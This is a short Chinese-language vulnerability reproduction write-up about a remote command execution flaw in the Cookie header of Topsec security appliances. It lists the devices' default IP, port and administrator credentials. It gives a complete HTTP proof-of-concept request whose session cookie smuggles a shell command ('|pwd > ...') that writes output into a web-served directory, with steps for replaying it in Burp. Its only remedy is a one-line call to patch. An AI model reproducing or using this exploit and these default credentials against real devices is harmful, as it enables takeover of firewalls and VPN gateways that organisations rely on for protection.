声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
一、漏洞概述
天融信安全漏洞响应中心,简称TOPSRC,是天融信致力于建设安全健康的互联网环境,保障天融信产品和业务线的信息安全,促进安全专家的合作与交流而建立的漏洞收集以及响应平台。
天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie 处存在RCE漏洞,会导致服务器失陷。
二、漏洞环境搭建
天融信资产更新速度挺快的,懂得都懂,毕竟是安全厂商龙头,所以只能下载旧版本的镜像或者提供的练习平台进行测试。
三、漏洞复现
访问https://192.168.1.254;8080,这个就是天融信默认的IP+端口
账号:superman
密码:talent
POC
GET /cgi/maincgi.cgi?Url=check HTTP/1.1
Host: 192.168.1.254:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Cookie: session_id_443=1|pwd > /www/htdocs/site/image/123.txt;
Connection: close
Content-Length: 2
然后使用burp抓包,发送到重放器,替换请求头
重放之后返回状态码为200,且请求体中返回pwd所执行的内容
四、修复建议
尽快联系厂商,打补丁